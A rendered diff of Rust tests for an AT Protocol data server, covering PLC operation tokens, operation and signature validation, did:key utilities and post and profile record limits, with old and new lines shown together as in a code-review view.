"SELECT t.token, t.expires_at FROM plc_operation_tokens t JOIN users u ON t.user_id = u.id WHERE u.did = $1",
did
)
.fetch_optional(&pool)
.await
.expect("Query failed");
).fetch_optional(&pool).await.unwrap();
assert!(row.is_some(), "PLC token should be created in database");
let row = row.unwrap();
assert!(
row.token.len() == 11,
"Token should be in format xxxxx-xxxxx"
);
assert_eq!(row.token.len(), 11, "Token should be in format xxxxx-xxxxx");
assert!(row.token.contains('-'), "Token should contain hyphen");
assert!(
row.expires_at > chrono::Utc::now(),
"Token should not be expired"
);
}
#[tokio::test]
async fn test_request_plc_operation_replaces_existing_token() {
let client = client();
let (token, did) = create_account_and_login(&client).await;
let res1 = client
.post(format!(
"{}/xrpc/com.atproto.identity.requestPlcOperationSignature",
base_url().await
))
.bearer_auth(&token)
.send()
.await
.expect("Request 1 failed");
assert_eq!(res1.status(), StatusCode::OK);
let db_url = get_db_connection_string().await;
let pool = PgPool::connect(&db_url).await.expect("DB connect failed");
let token1 = sqlx::query_scalar!(
r#"
SELECT t.token
FROM plc_operation_tokens t
JOIN users u ON t.user_id = u.id
WHERE u.did = $1
"#,
did
)
.fetch_one(&pool)
.await
.expect("Query failed");
let res2 = client
.post(format!(
"{}/xrpc/com.atproto.identity.requestPlcOperationSignature",
base_url().await
))
.bearer_auth(&token)
.send()
.await
.expect("Request 2 failed");
assert_eq!(res2.status(), StatusCode::OK);
assert!(row.expires_at > chrono::Utc::now(), "Token should not be expired");
let diff = row.expires_at - chrono::Utc::now();
assert!(diff.num_minutes() >= 9 && diff.num_minutes() <= 11, "Token should expire in ~10 minutes");
let token1 = row.token.clone();
let res = client.post(format!("{}/xrpc/com.atproto.identity.requestPlcOperationSignature", base_url().await))
.bearer_auth(&token).send().await.unwrap();
assert_eq!(res.status(), StatusCode::OK);
let token2 = sqlx::query_scalar!(
r#"
SELECT t.token
FROM plc_operation_tokens t
JOIN users u ON t.user_id = u.id
WHERE u.did = $1
"#,
did
)
.fetch_one(&pool)
.await
.expect("Query failed");
"SELECT t.token FROM plc_operation_tokens t JOIN users u ON t.user_id = u.id WHERE u.did = $1", did
).fetch_one(&pool).await.unwrap();
assert_ne!(token1, token2, "Second request should generate a new token");
let count: i64 = sqlx::query_scalar!(
r#"
SELECT COUNT(*) as "count!"
FROM plc_operation_tokens t
JOIN users u ON t.user_id = u.id
WHERE u.did = $1
"#,
did
)
.fetch_one(&pool)
.await
.expect("Count query failed");
"SELECT COUNT(*) as \"count!\" FROM plc_operation_tokens t JOIN users u ON t.user_id = u.id WHERE u.did = $1", did
).fetch_one(&pool).await.unwrap();
assert_eq!(count, 1, "Should only have one token per user");
}
#[tokio::test]
async fn test_submit_plc_operation_wrong_verification_method() {
let client = client();
let (token, did) = create_account_and_login(&client).await;
let hostname =
std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| format!("127.0.0.1:{}", app_port()));
let handle = did.split(':').last().unwrap_or("user");
let res = client
.post(format!(
"{}/xrpc/com.atproto.identity.submitPlcOperation",
base_url().await
))
.bearer_auth(&token)
.json(&json!({
"operation": {
"type": "plc_operation",
"rotationKeys": ["did:key:zWrongRotationKey123"],
"verificationMethods": {"atproto": "did:key:zWrongVerificationKey456"},
"alsoKnownAs": [format!("at://{}", handle)],
"services": {
"atproto_pds": {
"type": "AtprotoPersonalDataServer",
"endpoint": format!("https://{}", hostname)
}
},
"prev": null,
"sig": "fake_signature"
}
}))
.send()
.await
.expect("Request failed");
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
let body: serde_json::Value = res.json().await.unwrap();
assert_eq!(body["error"], "InvalidRequest");
assert!(
body["message"]
.as_str()
.unwrap_or("")
.contains("signing key")
|| body["message"].as_str().unwrap_or("").contains("rotation"),
"Error should mention key mismatch: {:?}",
body
);
}
#[tokio::test]
async fn test_submit_plc_operation_wrong_handle() {
let client = client();
let (token, _did) = create_account_and_login(&client).await;
let hostname =
std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| format!("127.0.0.1:{}", app_port()));
let res = client
.post(format!(
"{}/xrpc/com.atproto.identity.submitPlcOperation",
base_url().await
))
.bearer_auth(&token)
.json(&json!({
"operation": {
"type": "plc_operation",
"rotationKeys": ["did:key:z123"],
"verificationMethods": {"atproto": "did:key:z456"},
"alsoKnownAs": ["at://totally.wrong.handle"],
"services": {
"atproto_pds": {
"type": "AtprotoPersonalDataServer",
"endpoint": format!("https://{}", hostname)
}
},
"prev": null,
"sig": "fake_signature"
}
}))
.send()
.await
.expect("Request failed");
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
let body: serde_json::Value = res.json().await.unwrap();
assert_eq!(body["error"], "InvalidRequest");
}
#[tokio::test]
async fn test_submit_plc_operation_wrong_service_type() {
let client = client();
let (token, _did) = create_account_and_login(&client).await;
let hostname =
std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| format!("127.0.0.1:{}", app_port()));
let res = client
.post(format!(
"{}/xrpc/com.atproto.identity.submitPlcOperation",
base_url().await
))
.bearer_auth(&token)
.json(&json!({
"operation": {
"type": "plc_operation",
"rotationKeys": ["did:key:z123"],
"verificationMethods": {"atproto": "did:key:z456"},
"alsoKnownAs": ["at://user"],
"services": {
"atproto_pds": {
"type": "WrongServiceType",
"endpoint": format!("https://{}", hostname)
}
},
"prev": null,
"sig": "fake_signature"
}
}))
.send()
.await
.expect("Request failed");
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
let body: serde_json::Value = res.json().await.unwrap();
assert_eq!(body["error"], "InvalidRequest");
}
#[tokio::test]
async fn test_plc_token_expiry_format() {
let client = client();
let (token, did) = create_account_and_login(&client).await;
let res = client
.post(format!(
"{}/xrpc/com.atproto.identity.requestPlcOperationSignature",
base_url().await
))
.bearer_auth(&token)
.send()
.await
.expect("Request failed");
assert_eq!(res.status(), StatusCode::OK);
let db_url = get_db_connection_string().await;
let pool = PgPool::connect(&db_url).await.expect("DB connect failed");
let row = sqlx::query!(
r#"
SELECT t.expires_at
FROM plc_operation_tokens t
JOIN users u ON t.user_id = u.id
WHERE u.did = $1
"#,
did
)
.fetch_one(&pool)
.await
.expect("Query failed");
let now = chrono::Utc::now();
let expires = row.expires_at;
let diff = expires - now;
assert!(
diff.num_minutes() >= 9,
"Token should expire in ~10 minutes, got {} minutes",
diff.num_minutes()
);
assert!(
diff.num_minutes() <= 11,
"Token should expire in ~10 minutes, got {} minutes",
diff.num_minutes()
);
}

View File

@@ -13,9 +13,7 @@ fn create_valid_operation() -> serde_json::Value {
let op = json!({
"type": "plc_operation",
"rotationKeys": [did_key.clone()],
"verificationMethods": {
"atproto": did_key.clone()
},
"verificationMethods": { "atproto": did_key.clone() },
"alsoKnownAs": ["at://test.handle"],
"services": {
"atproto_pds": {
@@ -29,444 +27,161 @@ fn create_valid_operation() -> serde_json::Value {
}
#[test]
fn test_validate_plc_operation_valid() {
fn test_plc_operation_basic_validation() {
let op = create_valid_operation();
let result = validate_plc_operation(&op);
assert!(result.is_ok());
assert!(validate_plc_operation(&op).is_ok());
let missing_type = json!({ "rotationKeys": [], "verificationMethods": {}, "alsoKnownAs": [], "services": {}, "sig": "test" });
assert!(matches!(validate_plc_operation(&missing_type), Err(PlcError::InvalidResponse(msg)) if msg.contains("Missing type")));
let invalid_type = json!({ "type": "invalid_type", "sig": "test" });
assert!(matches!(validate_plc_operation(&invalid_type), Err(PlcError::InvalidResponse(msg)) if msg.contains("Invalid type")));
let missing_sig = json!({ "type": "plc_operation", "rotationKeys": [], "verificationMethods": {}, "alsoKnownAs": [], "services": {} });
assert!(matches!(validate_plc_operation(&missing_sig), Err(PlcError::InvalidResponse(msg)) if msg.contains("Missing sig")));
let missing_rotation = json!({ "type": "plc_operation", "verificationMethods": {}, "alsoKnownAs": [], "services": {}, "sig": "test" });
assert!(matches!(validate_plc_operation(&missing_rotation), Err(PlcError::InvalidResponse(msg)) if msg.contains("rotationKeys")));
let missing_verification = json!({ "type": "plc_operation", "rotationKeys": [], "alsoKnownAs": [], "services": {}, "sig": "test" });
assert!(matches!(validate_plc_operation(&missing_verification), Err(PlcError::InvalidResponse(msg)) if msg.contains("verificationMethods")));
let missing_aka = json!({ "type": "plc_operation", "rotationKeys": [], "verificationMethods": {}, "services": {}, "sig": "test" });
assert!(matches!(validate_plc_operation(&missing_aka), Err(PlcError::InvalidResponse(msg)) if msg.contains("alsoKnownAs")));
let missing_services = json!({ "type": "plc_operation", "rotationKeys": [], "verificationMethods": {}, "alsoKnownAs": [], "sig": "test" });
assert!(matches!(validate_plc_operation(&missing_services), Err(PlcError::InvalidResponse(msg)) if msg.contains("services")));
assert!(matches!(validate_plc_operation(&json!("not an object")), Err(PlcError::InvalidResponse(_))));
}
#[test]
fn test_validate_plc_operation_missing_type() {
let op = json!({
"rotationKeys": [],
"verificationMethods": {},
"alsoKnownAs": [],
"services": {},
"sig": "test"
});
let result = validate_plc_operation(&op);
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("Missing type")));
}
#[test]
fn test_validate_plc_operation_invalid_type() {
let op = json!({
"type": "invalid_type",
"sig": "test"
});
let result = validate_plc_operation(&op);
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("Invalid type")));
}
#[test]
fn test_validate_plc_operation_missing_sig() {
let op = json!({
"type": "plc_operation",
"rotationKeys": [],
"verificationMethods": {},
"alsoKnownAs": [],
"services": {}
});
let result = validate_plc_operation(&op);
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("Missing sig")));
}
#[test]
fn test_validate_plc_operation_missing_rotation_keys() {
let op = json!({
"type": "plc_operation",
"verificationMethods": {},
"alsoKnownAs": [],
"services": {},
"sig": "test"
});
let result = validate_plc_operation(&op);
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("rotationKeys")));
}
#[test]
fn test_validate_plc_operation_missing_verification_methods() {
let op = json!({
"type": "plc_operation",
"rotationKeys": [],
"alsoKnownAs": [],
"services": {},
"sig": "test"
});
let result = validate_plc_operation(&op);
assert!(
matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("verificationMethods"))
);
}
#[test]
fn test_validate_plc_operation_missing_also_known_as() {
let op = json!({
"type": "plc_operation",
"rotationKeys": [],
"verificationMethods": {},
"services": {},
"sig": "test"
});
let result = validate_plc_operation(&op);
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("alsoKnownAs")));
}
#[test]
fn test_validate_plc_operation_missing_services() {
let op = json!({
"type": "plc_operation",
"rotationKeys": [],
"verificationMethods": {},
"alsoKnownAs": [],
"sig": "test"
});
let result = validate_plc_operation(&op);
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("services")));
}
#[test]
fn test_validate_rotation_key_required() {
fn test_plc_submission_validation() {
let key = SigningKey::random(&mut rand::thread_rng());
let did_key = signing_key_to_did_key(&key);
let server_key = "did:key:zServer123";
let op = json!({
let base_op = |rotation_key: &str, signing_key: &str, handle: &str, service_type: &str, endpoint: &str| json!({
"type": "plc_operation",
"rotationKeys": [did_key.clone()],
"verificationMethods": {"atproto": did_key.clone()},
"alsoKnownAs": ["at://test.handle"],
"services": {
"atproto_pds": {
"type": "AtprotoPersonalDataServer",
"endpoint": "https://pds.example.com"
}
},
"rotationKeys": [rotation_key],
"verificationMethods": {"atproto": signing_key},
"alsoKnownAs": [format!("at://{}", handle)],
"services": { "atproto_pds": { "type": service_type, "endpoint": endpoint } },
"sig": "test"
});
let ctx = PlcValidationContext {
server_rotation_key: server_key.to_string(),
expected_signing_key: did_key.clone(),
expected_handle: "test.handle".to_string(),
expected_pds_endpoint: "https://pds.example.com".to_string(),
};
let result = validate_plc_operation_for_submission(&op, &ctx);
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("rotation key")));
}
#[test]
fn test_validate_signing_key_match() {
let key = SigningKey::random(&mut rand::thread_rng());
let did_key = signing_key_to_did_key(&key);
let wrong_key = "did:key:zWrongKey456";
let op = json!({
"type": "plc_operation",
"rotationKeys": [did_key.clone()],
"verificationMethods": {"atproto": wrong_key},
"alsoKnownAs": ["at://test.handle"],
"services": {
"atproto_pds": {
"type": "AtprotoPersonalDataServer",
"endpoint": "https://pds.example.com"
}
},
"sig": "test"
});
let ctx = PlcValidationContext {
let op = base_op(&did_key, &did_key, "test.handle", "AtprotoPersonalDataServer", "https://pds.example.com");
assert!(matches!(validate_plc_operation_for_submission(&op, &ctx), Err(PlcError::InvalidResponse(msg)) if msg.contains("rotation key")));
let ctx_with_user_key = PlcValidationContext {
server_rotation_key: did_key.clone(),
expected_signing_key: did_key.clone(),
expected_handle: "test.handle".to_string(),
expected_pds_endpoint: "https://pds.example.com".to_string(),
};
let result = validate_plc_operation_for_submission(&op, &ctx);
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("signing key")));
let wrong_signing = base_op(&did_key, "did:key:zWrongKey", "test.handle", "AtprotoPersonalDataServer", "https://pds.example.com");
assert!(matches!(validate_plc_operation_for_submission(&wrong_signing, &ctx_with_user_key), Err(PlcError::InvalidResponse(msg)) if msg.contains("signing key")));
let wrong_handle = base_op(&did_key, &did_key, "wrong.handle", "AtprotoPersonalDataServer", "https://pds.example.com");
assert!(matches!(validate_plc_operation_for_submission(&wrong_handle, &ctx_with_user_key), Err(PlcError::InvalidResponse(msg)) if msg.contains("handle")));
let wrong_service_type = base_op(&did_key, &did_key, "test.handle", "WrongServiceType", "https://pds.example.com");
assert!(matches!(validate_plc_operation_for_submission(&wrong_service_type, &ctx_with_user_key), Err(PlcError::InvalidResponse(msg)) if msg.contains("type")));
let wrong_endpoint = base_op(&did_key, &did_key, "test.handle", "AtprotoPersonalDataServer", "https://wrong.endpoint.com");
assert!(matches!(validate_plc_operation_for_submission(&wrong_endpoint, &ctx_with_user_key), Err(PlcError::InvalidResponse(msg)) if msg.contains("endpoint")));
}
#[test]
fn test_validate_handle_match() {
fn test_signature_verification() {
let key = SigningKey::random(&mut rand::thread_rng());
let did_key = signing_key_to_did_key(&key);
let op = json!({
"type": "plc_operation",
"rotationKeys": [did_key.clone()],
"verificationMethods": {"atproto": did_key.clone()},
"alsoKnownAs": ["at://wrong.handle"],
"services": {
"atproto_pds": {
"type": "AtprotoPersonalDataServer",
"endpoint": "https://pds.example.com"
}
},
"sig": "test"
});
let ctx = PlcValidationContext {
server_rotation_key: did_key.clone(),
expected_signing_key: did_key.clone(),
expected_handle: "test.handle".to_string(),
expected_pds_endpoint: "https://pds.example.com".to_string(),
};
let result = validate_plc_operation_for_submission(&op, &ctx);
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("handle")));
}
#[test]
fn test_validate_pds_service_type() {
let key = SigningKey::random(&mut rand::thread_rng());
let did_key = signing_key_to_did_key(&key);
let op = json!({
"type": "plc_operation",
"rotationKeys": [did_key.clone()],
"verificationMethods": {"atproto": did_key.clone()},
"alsoKnownAs": ["at://test.handle"],
"services": {
"atproto_pds": {
"type": "WrongServiceType",
"endpoint": "https://pds.example.com"
}
},
"sig": "test"
});
let ctx = PlcValidationContext {
server_rotation_key: did_key.clone(),
expected_signing_key: did_key.clone(),
expected_handle: "test.handle".to_string(),
expected_pds_endpoint: "https://pds.example.com".to_string(),
};
let result = validate_plc_operation_for_submission(&op, &ctx);
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("type")));
}
#[test]
fn test_validate_pds_endpoint_match() {
let key = SigningKey::random(&mut rand::thread_rng());
let did_key = signing_key_to_did_key(&key);
let op = json!({
"type": "plc_operation",
"rotationKeys": [did_key.clone()],
"verificationMethods": {"atproto": did_key.clone()},
"alsoKnownAs": ["at://test.handle"],
"services": {
"atproto_pds": {
"type": "AtprotoPersonalDataServer",
"endpoint": "https://wrong.endpoint.com"
}
},
"sig": "test"
});
let ctx = PlcValidationContext {
server_rotation_key: did_key.clone(),
expected_signing_key: did_key.clone(),
expected_handle: "test.handle".to_string(),
expected_pds_endpoint: "https://pds.example.com".to_string(),
};
let result = validate_plc_operation_for_submission(&op, &ctx);
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("endpoint")));
}
#[test]
fn test_verify_signature_secp256k1() {
let key = SigningKey::random(&mut rand::thread_rng());
let did_key = signing_key_to_did_key(&key);
let op = json!({
"type": "plc_operation",
"rotationKeys": [did_key.clone()],
"verificationMethods": {},
"alsoKnownAs": [],
"services": {},
"prev": null
"type": "plc_operation", "rotationKeys": [did_key.clone()],
"verificationMethods": {}, "alsoKnownAs": [], "services": {}, "prev": null
});
let signed = sign_operation(&op, &key).unwrap();
let rotation_keys = vec![did_key];
let result = verify_operation_signature(&signed, &rotation_keys);
assert!(result.is_ok());
assert!(result.unwrap());
}
let result = verify_operation_signature(&signed, &[did_key.clone()]);
assert!(result.is_ok() && result.unwrap());
#[test]
fn test_verify_signature_wrong_key() {
let key = SigningKey::random(&mut rand::thread_rng());
let other_key = SigningKey::random(&mut rand::thread_rng());
let other_did_key = signing_key_to_did_key(&other_key);
let op = json!({
"type": "plc_operation",
"rotationKeys": [],
"verificationMethods": {},
"alsoKnownAs": [],
"services": {},
"prev": null
let other_did = signing_key_to_did_key(&other_key);
let result = verify_operation_signature(&signed, &[other_did]);
assert!(result.is_ok() && !result.unwrap());
let result = verify_operation_signature(&signed, &["not-a-did-key".to_string()]);
assert!(result.is_ok() && !result.unwrap());
let missing_sig = json!({ "type": "plc_operation", "rotationKeys": [], "verificationMethods": {}, "alsoKnownAs": [], "services": {} });
assert!(matches!(verify_operation_signature(&missing_sig, &[]), Err(PlcError::InvalidResponse(msg)) if msg.contains("sig")));
let invalid_base64 = json!({
"type": "plc_operation", "rotationKeys": [], "verificationMethods": {},
"alsoKnownAs": [], "services": {}, "sig": "not-valid-base64!!!"
});
let signed = sign_operation(&op, &key).unwrap();
let wrong_rotation_keys = vec![other_did_key];
let result = verify_operation_signature(&signed, &wrong_rotation_keys);
assert!(result.is_ok());
assert!(!result.unwrap());
assert!(matches!(verify_operation_signature(&invalid_base64, &[]), Err(PlcError::InvalidResponse(_))));
}
#[test]
fn test_verify_signature_invalid_did_key_format() {
let key = SigningKey::random(&mut rand::thread_rng());
let op = json!({
"type": "plc_operation",
"rotationKeys": [],
"verificationMethods": {},
"alsoKnownAs": [],
"services": {},
"prev": null
});
let signed = sign_operation(&op, &key).unwrap();
let invalid_keys = vec!["not-a-did-key".to_string()];
let result = verify_operation_signature(&signed, &invalid_keys);
assert!(result.is_ok());
assert!(!result.unwrap());
}
#[test]
fn test_tombstone_validation() {
let op = json!({
"type": "plc_tombstone",
"prev": "bafyreig6xxxxxyyyyyzzzzzz",
"sig": "test"
});
let result = validate_plc_operation(&op);
assert!(result.is_ok());
}
#[test]
fn test_cid_for_cbor_deterministic() {
let value = json!({
"alpha": 1,
"beta": 2
});
fn test_cid_and_key_utilities() {
let value = json!({ "alpha": 1, "beta": 2 });
let cid1 = cid_for_cbor(&value).unwrap();
let cid2 = cid_for_cbor(&value).unwrap();
assert_eq!(cid1, cid2, "CID generation should be deterministic");
assert!(
cid1.starts_with("bafyrei"),
"CID should start with bafyrei (dag-cbor + sha256)"
);
}
assert_eq!(cid1, cid2, "CID should be deterministic");
assert!(cid1.starts_with("bafyrei"), "CID should be dag-cbor + sha256");
#[test]
fn test_cid_different_for_different_data() {
let value1 = json!({"data": 1});
let value2 = json!({"data": 2});
let cid1 = cid_for_cbor(&value1).unwrap();
let cid2 = cid_for_cbor(&value2).unwrap();
assert_ne!(cid1, cid2, "Different data should produce different CIDs");
}
let value2 = json!({ "alpha": 999 });
let cid3 = cid_for_cbor(&value2).unwrap();
assert_ne!(cid1, cid3, "Different data should produce different CIDs");
#[test]
fn test_signing_key_to_did_key_format() {
let key = SigningKey::random(&mut rand::thread_rng());
let did_key = signing_key_to_did_key(&key);
assert!(
did_key.starts_with("did:key:z"),
"Should start with did:key:z"
);
assert!(did_key.len() > 50, "Did key should be reasonably long");
}
let did = signing_key_to_did_key(&key);
assert!(did.starts_with("did:key:z") && did.len() > 50);
assert_eq!(did, signing_key_to_did_key(&key), "Same key should produce same did");
#[test]
fn test_signing_key_to_did_key_unique() {
let key1 = SigningKey::random(&mut rand::thread_rng());
let key2 = SigningKey::random(&mut rand::thread_rng());
let did1 = signing_key_to_did_key(&key1);
let did2 = signing_key_to_did_key(&key2);
assert_ne!(
did1, did2,
"Different keys should produce different did:keys"
);
assert_ne!(did, signing_key_to_did_key(&key2), "Different keys should produce different dids");
}
#[test]
fn test_signing_key_to_did_key_consistent() {
let key = SigningKey::random(&mut rand::thread_rng());
let did1 = signing_key_to_did_key(&key);
let did2 = signing_key_to_did_key(&key);
assert_eq!(did1, did2, "Same key should produce same did:key");
}
fn test_tombstone_operations() {
let tombstone = json!({ "type": "plc_tombstone", "prev": "bafyreig6xxxxxyyyyyzzzzzz", "sig": "test" });
assert!(validate_plc_operation(&tombstone).is_ok());
#[test]
fn test_sign_operation_removes_existing_sig() {
let key = SigningKey::random(&mut rand::thread_rng());
let op = json!({
"type": "plc_operation",
"rotationKeys": [],
"verificationMethods": {},
"alsoKnownAs": [],
"services": {},
"prev": null,
"sig": "old_signature"
});
let signed = sign_operation(&op, &key).unwrap();
let new_sig = signed.get("sig").and_then(|v| v.as_str()).unwrap();
assert_ne!(new_sig, "old_signature", "Should replace old signature");
}
#[test]
fn test_validate_plc_operation_not_object() {
let result = validate_plc_operation(&json!("not an object"));
assert!(matches!(result, Err(PlcError::InvalidResponse(_))));
}
#[test]
fn test_validate_for_submission_tombstone_passes() {
let key = SigningKey::random(&mut rand::thread_rng());
let did_key = signing_key_to_did_key(&key);
let op = json!({
"type": "plc_tombstone",
"prev": "bafyreig6xxxxxyyyyyzzzzzz",
"sig": "test"
});
let ctx = PlcValidationContext {
server_rotation_key: did_key.clone(),
expected_signing_key: did_key,
expected_handle: "test.handle".to_string(),
expected_pds_endpoint: "https://pds.example.com".to_string(),
};
let result = validate_plc_operation_for_submission(&op, &ctx);
assert!(
result.is_ok(),
"Tombstone should pass submission validation"
);
assert!(validate_plc_operation_for_submission(&tombstone, &ctx).is_ok());
}
#[test]
fn test_verify_signature_missing_sig() {
fn test_sign_operation_and_struct() {
let key = SigningKey::random(&mut rand::thread_rng());
let op = json!({
"type": "plc_operation",
"rotationKeys": [],
"verificationMethods": {},
"alsoKnownAs": [],
"services": {}
"type": "plc_operation", "rotationKeys": [], "verificationMethods": {},
"alsoKnownAs": [], "services": {}, "prev": null, "sig": "old_signature"
});
let result = verify_operation_signature(&op, &[]);
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("sig")));
}
let signed = sign_operation(&op, &key).unwrap();
assert_ne!(signed.get("sig").and_then(|v| v.as_str()).unwrap(), "old_signature");
#[test]
fn test_verify_signature_invalid_base64() {
let op = json!({
"type": "plc_operation",
"rotationKeys": [],
"verificationMethods": {},
"alsoKnownAs": [],
"services": {},
"sig": "not-valid-base64!!!"
});
let result = verify_operation_signature(&op, &[]);
assert!(matches!(result, Err(PlcError::InvalidResponse(_))));
}
#[test]
fn test_plc_operation_struct() {
let mut services = HashMap::new();
services.insert(
"atproto_pds".to_string(),
PlcService {
service_type: "AtprotoPersonalDataServer".to_string(),
endpoint: "https://pds.example.com".to_string(),
},
);
services.insert("atproto_pds".to_string(), PlcService {
service_type: "AtprotoPersonalDataServer".to_string(),
endpoint: "https://pds.example.com".to_string(),
});
let mut verification_methods = HashMap::new();
verification_methods.insert("atproto".to_string(), "did:key:zTest123".to_string());
let op = PlcOperation {

View File

@@ -9,187 +9,117 @@ fn now() -> String {
}
#[test]
fn test_validate_post_valid() {
fn test_post_record_validation() {
let validator = RecordValidator::new();
let post = json!({
let valid_post = json!({
"$type": "app.bsky.feed.post",
"text": "Hello world!",
"createdAt": now()
});
let result = validator.validate(&post, "app.bsky.feed.post");
assert_eq!(result.unwrap(), ValidationStatus::Valid);
}
assert_eq!(validator.validate(&valid_post, "app.bsky.feed.post").unwrap(), ValidationStatus::Valid);
#[test]
fn test_validate_post_missing_text() {
let validator = RecordValidator::new();
let post = json!({
let missing_text = json!({
"$type": "app.bsky.feed.post",
"createdAt": now()
});
let result = validator.validate(&post, "app.bsky.feed.post");
assert!(matches!(result, Err(ValidationError::MissingField(f)) if f == "text"));
}
assert!(matches!(validator.validate(&missing_text, "app.bsky.feed.post"), Err(ValidationError::MissingField(f)) if f == "text"));
#[test]
fn test_validate_post_missing_created_at() {
let validator = RecordValidator::new();
let post = json!({
let missing_created_at = json!({
"$type": "app.bsky.feed.post",
"text": "Hello"
});
let result = validator.validate(&post, "app.bsky.feed.post");
assert!(matches!(result, Err(ValidationError::MissingField(f)) if f == "createdAt"));
}
assert!(matches!(validator.validate(&missing_created_at, "app.bsky.feed.post"), Err(ValidationError::MissingField(f)) if f == "createdAt"));
#[test]
fn test_validate_post_text_too_long() {
let validator = RecordValidator::new();
let long_text = "a".repeat(3001);
let post = json!({
let text_too_long = json!({
"$type": "app.bsky.feed.post",
"text": long_text,
"text": "a".repeat(3001),
"createdAt": now()
});
let result = validator.validate(&post, "app.bsky.feed.post");
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "text"));
}
assert!(matches!(validator.validate(&text_too_long, "app.bsky.feed.post"), Err(ValidationError::InvalidField { path, .. }) if path == "text"));
#[test]
fn test_validate_post_text_at_limit() {
let validator = RecordValidator::new();
let limit_text = "a".repeat(3000);
let post = json!({
let text_at_limit = json!({
"$type": "app.bsky.feed.post",
"text": limit_text,
"text": "a".repeat(3000),
"createdAt": now()
});
let result = validator.validate(&post, "app.bsky.feed.post");
assert_eq!(result.unwrap(), ValidationStatus::Valid);
}
assert_eq!(validator.validate(&text_at_limit, "app.bsky.feed.post").unwrap(), ValidationStatus::Valid);
#[test]
fn test_validate_post_too_many_langs() {
let validator = RecordValidator::new();
let post = json!({
let too_many_langs = json!({
"$type": "app.bsky.feed.post",
"text": "Hello",
"createdAt": now(),
"langs": ["en", "fr", "de", "es"]
});
let result = validator.validate(&post, "app.bsky.feed.post");
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "langs"));
}
assert!(matches!(validator.validate(&too_many_langs, "app.bsky.feed.post"), Err(ValidationError::InvalidField { path, .. }) if path == "langs"));
#[test]
fn test_validate_post_three_langs_ok() {
let validator = RecordValidator::new();
let post = json!({
let three_langs_ok = json!({
"$type": "app.bsky.feed.post",
"text": "Hello",
"createdAt": now(),
"langs": ["en", "fr", "de"]
});
let result = validator.validate(&post, "app.bsky.feed.post");
assert_eq!(result.unwrap(), ValidationStatus::Valid);
}
assert_eq!(validator.validate(&three_langs_ok, "app.bsky.feed.post").unwrap(), ValidationStatus::Valid);
#[test]
fn test_validate_post_too_many_tags() {
let validator = RecordValidator::new();
let post = json!({
let too_many_tags = json!({
"$type": "app.bsky.feed.post",
"text": "Hello",
"createdAt": now(),
"tags": ["tag1", "tag2", "tag3", "tag4", "tag5", "tag6", "tag7", "tag8", "tag9"]
});
let result = validator.validate(&post, "app.bsky.feed.post");
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "tags"));
}
assert!(matches!(validator.validate(&too_many_tags, "app.bsky.feed.post"), Err(ValidationError::InvalidField { path, .. }) if path == "tags"));
#[test]
fn test_validate_post_eight_tags_ok() {
let validator = RecordValidator::new();
let post = json!({
let eight_tags_ok = json!({
"$type": "app.bsky.feed.post",
"text": "Hello",
"createdAt": now(),
"tags": ["tag1", "tag2", "tag3", "tag4", "tag5", "tag6", "tag7", "tag8"]
});
let result = validator.validate(&post, "app.bsky.feed.post");
assert_eq!(result.unwrap(), ValidationStatus::Valid);
}
assert_eq!(validator.validate(&eight_tags_ok, "app.bsky.feed.post").unwrap(), ValidationStatus::Valid);
#[test]
fn test_validate_post_tag_too_long() {
let validator = RecordValidator::new();
let long_tag = "t".repeat(641);
let post = json!({
let tag_too_long = json!({
"$type": "app.bsky.feed.post",
"text": "Hello",
"createdAt": now(),
"tags": [long_tag]
"tags": ["t".repeat(641)]
});
let result = validator.validate(&post, "app.bsky.feed.post");
assert!(
matches!(result, Err(ValidationError::InvalidField { path, .. }) if path.starts_with("tags/"))
);
assert!(matches!(validator.validate(&tag_too_long, "app.bsky.feed.post"), Err(ValidationError::InvalidField { path, .. }) if path.starts_with("tags/")));
}
#[test]
fn test_validate_profile_valid() {
fn test_profile_record_validation() {
let validator = RecordValidator::new();
let profile = json!({
let valid = json!({
"$type": "app.bsky.actor.profile",
"displayName": "Test User",
"description": "A test user profile"
});
let result = validator.validate(&profile, "app.bsky.actor.profile");
assert_eq!(result.unwrap(), ValidationStatus::Valid);
}
assert_eq!(validator.validate(&valid, "app.bsky.actor.profile").unwrap(), ValidationStatus::Valid);
#[test]
fn test_validate_profile_empty_ok() {
let validator = RecordValidator::new();
let profile = json!({
let empty_ok = json!({
"$type": "app.bsky.actor.profile"
});
let result = validator.validate(&profile, "app.bsky.actor.profile");
assert_eq!(result.unwrap(), ValidationStatus::Valid);
}
assert_eq!(validator.validate(&empty_ok, "app.bsky.actor.profile").unwrap(), ValidationStatus::Valid);
#[test]
fn test_validate_profile_displayname_too_long() {
let validator = RecordValidator::new();
let long_name = "n".repeat(641);
let profile = json!({
let displayname_too_long = json!({
"$type": "app.bsky.actor.profile",
"displayName": long_name
"displayName": "n".repeat(641)
});
let result = validator.validate(&profile, "app.bsky.actor.profile");
assert!(
matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "displayName")
);
}
assert!(matches!(validator.validate(&displayname_too_long, "app.bsky.actor.profile"), Err(ValidationError::InvalidField { path, .. }) if path == "displayName"));
#[test]
fn test_validate_profile_description_too_long() {
let validator = RecordValidator::new();
let long_desc = "d".repeat(2561);
